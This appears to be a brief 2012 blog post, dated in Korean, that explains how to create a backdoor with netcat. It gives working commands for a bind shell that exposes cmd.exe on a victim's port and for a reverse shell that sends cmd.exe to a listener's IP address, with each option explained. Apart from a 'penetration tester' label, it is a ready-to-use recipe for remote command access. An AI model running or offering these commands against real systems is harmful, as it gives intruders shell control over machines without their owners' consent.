2012년 6월 19일 화요일

Making a easy backdoor using netcat

1. Port open and connect

      Victim : nc -l -p Port -e Program to be executed
                   ex). nc -l -p 80 -e cmd.exe

               
                   option -l : Listen mode, for inbound connects.

                              -p : Specify local port for remote connects.

                               -e : -e spawns the executable with its input and output
                                       redirected via network socket.


      Penetration tester : nc ip_address port
                                   ex). nc 192.168.0.4 80




2. Use reverse telnet.

     Penetration tester : nc -l Port -v
                                  ex). nc -l 7777 -v

                                  option -l : Listen mode, for inbound connects.

                                           -v : Have nc give more verbose output.




    Victim : nc -e Program to be executed ip_address Port
                ex).nc -e cmd.exe 192.168.0.3 7777

                option -e : -e spawns the executable with its input and output
                                redirected via network socket.


View more option

댓글 없음:

댓글 쓰기